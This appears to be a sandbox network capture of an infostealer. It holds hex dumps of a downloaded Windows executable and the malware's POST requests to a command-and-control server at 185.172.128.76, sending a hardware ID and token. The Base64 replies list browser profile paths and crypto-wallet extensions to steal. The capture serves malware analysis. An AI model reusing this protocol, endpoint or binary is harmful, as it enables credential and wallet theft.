Apr 26, 2024 10:26:59.469929934 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:26:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 08:15:01 GMT ETag: "41600-616fb8011d9a7" Accept-Ranges: bytes Content-Length: 267776 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 d0 c0 c8 ed b1 ae 9b ed b1 ae 9b ed b1 ae 9b e0 e3 71 9b f1 b1 ae 9b e0 e3 4e 9b 92 b1 ae 9b e0 e3 4f 9b c2 b1 ae 9b e4 c9 3d 9b ee b1 ae 9b ed b1 af 9b 81 b1 ae 9b 58 2f 4b 9b ec b1 ae 9b e0 e3 75 9b ec b1 ae 9b 58 2f 70 9b ec b1 ae 9b 52 69 63 68 ed b1 ae 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 61 16 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 02 01 00 00 ec c1 03 00 00 00 00 57 44 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 c3 03 00 04 00 00 14 fd 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 83 01 00 28 00 00 00 00 30 c2 03 f8 d5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c3 03 80 13 00 00 f0 21 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 00 01 00 00 10 00 00 00 02 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 6c 00 00 00 20 01 00 00 6e 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 92 c0 03 00 90 01 00 00 b8 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 d5 00 00 00 30 c2 03 00 d6 00 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 c3 03 00 14 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 4c 11 02 04 e8 75 02 00 00 68 2b 10 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qNO=X/KuX/pRichPELaxdWD @0(0!8x@ \|.text5 `.rdatabl n@@.data(t@.rsrc0,@@.reloc@BLuh+
Apr 26, 2024 10:26:59.469974041 CEST	1289	IN	Data Raw: 41 00 e8 4f 2e 00 00 59 c3 b9 54 11 02 04 e8 c8 02 00 00 68 21 10 41 00 e8 39 2e 00 00 59 c3 b9 40 11 02 04 e8 1f 03 00 00 68 17 10 41 00 e8 23 2e 00 00 59 c3 6a 00 b9 48 11 02 04 e8 15 01 00 00 c3 6a 00 b9 3c 11 02 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: AO.YTh!A9.Y@hA#.YjHj<jPjDUQQL$$x]E]UQQQQ$&]EYY]UVEPLEA^]LEADUVEtV
Apr 26, 2024 10:26:59.470012903 CEST	1289	IN	Data Raw: 00 53 53 ff 15 34 20 41 00 8d 45 c8 50 ff 15 0c 20 41 00 53 53 53 ff 15 2c 20 41 00 8d 85 b0 fb ff ff 50 53 ff 15 98 20 41 00 53 53 ff 15 94 20 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 40 20 41 00 53 53 53 53 ff 15 54 20 41 00 8b 45 f8 8b 0d 30 Data Ascii: SS4 AEP ASSS, APS ASS AEPSEPS@ ASSSST AE0+}uS AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V50W=$t
Apr 26, 2024 10:26:59.470052004 CEST	1289	IN	Data Raw: 24 08 08 30 ca 11 b8 97 8c fa 72 f7 64 24 0c 8b 44 24 0c b8 80 b4 ab 2f f7 64 24 14 8b 44 24 14 b8 1e 18 24 33 f7 64 24 10 8b 44 24 10 b8 f1 ae 8e 20 f7 64 24 10 8b 44 24 10 81 44 24 08 0d 33 ae 67 81 44 24 14 94 fb 09 11 b8 d3 ae 4e 14 f7 64 24 Data Ascii: $0rd$D$/d$D$$3d$D$ d$D$D$3gD$Nd$D$l$ \|yHl$Nl$}7d$D$l$Iip0yd$D$oS@d$D$D$axl$#MD$$fvD$4R5U+d$D$l$ukmWebd$4D$4l$7D$8e6D$
Apr 26, 2024 10:26:59.470091105 CEST	1289	IN	Data Raw: 04 00 ff 31 e8 2a 02 00 00 c3 55 8b ec 56 57 8b 7d 08 8b f1 57 e8 5a 01 00 00 8b ce 84 c0 74 15 ff 75 0c e8 a6 01 00 00 2b f8 8b ce 57 56 e8 71 fe ff ff eb 2e 6a 00 ff 75 0c e8 cf 00 00 00 84 c0 74 1e ff 75 0c 8b ce 57 e8 80 01 00 00 50 e8 b0 f1 Data Ascii: 1*UVW}WZtu+WVq.jutuWPu_^]UEV9FrPh^]&USVW}^;rCM+;wW%t(U++QQPMS_^[]UQVuEPE
Apr 26, 2024 10:26:59.470129013 CEST	1289	IN	Data Raw: 00 8b 55 08 50 e8 d2 00 00 00 5d c2 08 00 33 c0 85 c9 74 15 83 f9 ff 77 0b 51 e8 b6 1f 00 00 59 85 c0 75 05 e9 cb 02 00 00 c3 6a 0c e8 a4 1f 00 00 59 85 c0 0f 84 ba 02 00 00 c3 56 8b f1 57 8b 7e 04 e8 25 00 00 00 83 ca ff 2b d7 03 c2 83 f8 01 72 Data Ascii: UP]3twQYujYVW~%+rG_F^hxAUUUUVuueMPJPG^]UVWMPV;_^]UMVPVD^]
Apr 26, 2024 10:26:59.470166922 CEST	1289	IN	Data Raw: e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 04 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 04 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 04 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 04 83 f9 10 7c 13 f3 0f 6f 0e 83 e9 10 Data Ascii: 0foF fon0v00fof:ffof:fGfof:fo 0}v\|ovfsvs~vf@ur$@r$@$+@$@@H@l@#FGF
Apr 26, 2024 10:26:59.470204115 CEST	1289	IN	Data Raw: 89 16 8b 4f 68 89 4e 04 3b 15 14 98 41 00 74 11 a1 d8 98 41 00 85 47 70 75 07 e8 e6 25 00 00 89 06 8b 46 04 5f 3b 05 ac 95 41 00 74 15 8b 4e 08 a1 d8 98 41 00 85 41 70 75 08 e8 48 29 00 00 89 46 04 8b 4e 08 8b 41 70 a8 02 75 16 83 c8 02 89 41 70 Data Ascii: OhN;AtAGpu%F_;AtNAApuH)FNApuApFAF^]Ujuu]UVuu""S]vm"!WuMExtuSV'-YYe3WWSVj
Apr 26, 2024 10:26:59.470241070 CEST	1289	IN	Data Raw: 33 40 00 90 5c 33 40 00 88 33 40 00 ac 33 40 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 38 34 40 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 Data Ascii: 3@\3@3@3@#FGFGr$84@I#FGr$84@#r$84@I/4@4@4@4@4@3@3@3@DDDDDDDDDDDDDD$84@H4@P4@
Apr 26, 2024 10:26:59.470278978 CEST	1289	IN	Data Raw: 70 30 41 00 06 66 0f 54 1d 50 30 41 00 66 0f d6 5c 24 04 dd 44 24 04 c3 55 8b ec 56 8b 75 08 83 fe e0 77 6f 53 57 a1 34 4e 43 00 85 c0 75 1d e8 71 2e 00 00 6a 1e e8 c7 2e 00 00 68 ff 00 00 00 e8 93 2b 00 00 a1 34 4e 43 00 59 59 85 f6 74 04 8b ce Data Ascii: p0AfTP0Af\$D$UVuwoSW4NCuq.j.h+4NCYYt3AQjP Au&j[90NCtVYu_[VYq3^]L$t$tNu$$~3t
Apr 26, 2024 10:26:59.710361958 CEST	1289	IN	Data Raw: 5e c3 83 26 00 33 c0 5e c3 6a 0c 68 28 7f 41 00 e8 6d 39 00 00 83 65 e4 00 e8 29 28 00 00 83 65 fc 00 ff 75 08 e8 23 00 00 00 59 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 0b 00 00 00 8b c6 e8 84 39 00 00 c3 8b 75 e4 e8 04 28 00 00 c3 55 8b ec 51 53 Data Ascii: ^&3^jh(Am9e)(eu#YuE9u(UQSV5 AW5"5"EE;+OrvP:GY;sG;s];rPS;YYuF;r>PSq;YYt1P A"u AKQ A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.172.128.76	80	7364	C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:01.406784058 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJ Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 41 35 37 39 42 41 33 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="hwid"3EA579BA33AD2322695909------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="build"default10------KEHCGCGCFHIDBFHIIJKJ--
Apr 26, 2024 10:27:01.959661007 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 6a 55 32 5a 44 42 6d 4d 54 52 6c 59 6d 52 68 59 7a 59 77 4d 6a 6b 34 4d 7a 68 6d 4e 7a 55 7a 4d 47 4d 78 59 32 52 6c 4d 47 51 77 4d 6d 56 6c 4e 44 45 30 4d 54 68 6a 5a 6a 68 68 4e 32 55 32 59 7a 4e 69 5a 6d 46 6a 5a 44 67 32 59 54 51 31 59 6d 45 78 59 6a 51 35 59 32 51 33 4d 6d 45 32 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MjU2ZDBmMTRlYmRhYzYwMjk4MzhmNzUzMGMxY2RlMGQwMmVlNDE0MThjZjhhN2U2YzNiZmFjZDg2YTQ1YmExYjQ5Y2Q3MmE2fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 26, 2024 10:27:01.961415052 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="message"browsers------JKFIDGDHJEGIEBFHDGDG--
Apr 26, 2024 10:27:02.310580969 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
Apr 26, 2024 10:27:02.310647011 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 26, 2024 10:27:02.312845945 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBF Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="message"plugins------CAEHDBAAECBFHJKFCFBF--
Apr 26, 2024 10:27:02.662957907 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 